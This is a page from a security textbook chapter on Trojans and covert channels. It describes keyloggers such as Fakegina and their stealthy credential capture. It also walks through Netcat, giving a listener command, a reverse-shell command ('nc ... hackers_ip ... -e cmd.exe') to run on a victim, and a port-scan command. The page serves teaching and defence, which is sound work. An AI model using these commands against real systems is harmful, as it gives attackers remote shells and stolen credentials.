204 Chapter 8 ■ Trojans, Viruses, Worms, and Covert Channels
Some of the keystroke recorders include these:
■ IKS Software Keylogger—A Windows-based keylogger that runs in the background on
a system at a very low level. Due to the way this software is designed and runs, it is very
hard to detect using most conventional means. The program is designed to run at such a
low level that it does not show up in process lists or through normal detection methods.
■ Ghost Keylogger—Another Windows-based keylogger that is designed to run silently in
the background on a system, much like IKS. The difference between this software and
IKS is that it can record activity to an encrypted log that can be e-mailed to the attacker.
■ Spector Pro—Designed to capture keystroke activity, e-mail passwords, chat
conversations and logs, and instant messages.
■ Fakegina—An advanced keylogger that is very specific in its choice of targets. This
software component is designed to capture usernames and passwords from a Windows
system. Specifically, it intercepts the communication between the Winlogon process
and the logon GUI in Windows.
Netcat is a simple command-line utility available for Linux, Unix, and Windows
platforms. It is designed to read information from connections using TCP or UDP and do
simple port redirection on them as configured.
Let’s look at the steps involved to use Netcat to perform port redirection. The first step
is for the hacker to set up what is known as a listener on their system. This prepares the
attacker’s system to receive the information from the victim’s system. To set up a listener,
the command is as follows:nc -n -v -l -p 80After this, the attacker needs to execute the following command on the victim’s system
to redirect the traffic to their system:nc -n hackers_ip 80 -e "cmd.exe"Once this is entered, the net effect is that the command shell on the victim’s system is at
the attacker’s command prompt, ready for input as desired.
Of course, Netcat has some other capabilities, including port scanning and placing files
on a victim’s system. Port scanning can be accomplished using the following command :nc -v -z -w1 IPaddress <start port> - <ending port>This command scans a range of ports as specified.
Netcat isn’t the only tool available to do port redirection. Tools such as Datapipe and
Fpipe can perform the same functions, albeit in different ways.
The following is a list of options available for Netcat:
■ Nc –d—Detaches Netcat from the console
■ Nc -l -p [port]—Creates a simple listening TCP port; adding -u places it into UDP
mode
■ Nc -e [program]—Redirects stdin/stdout from a program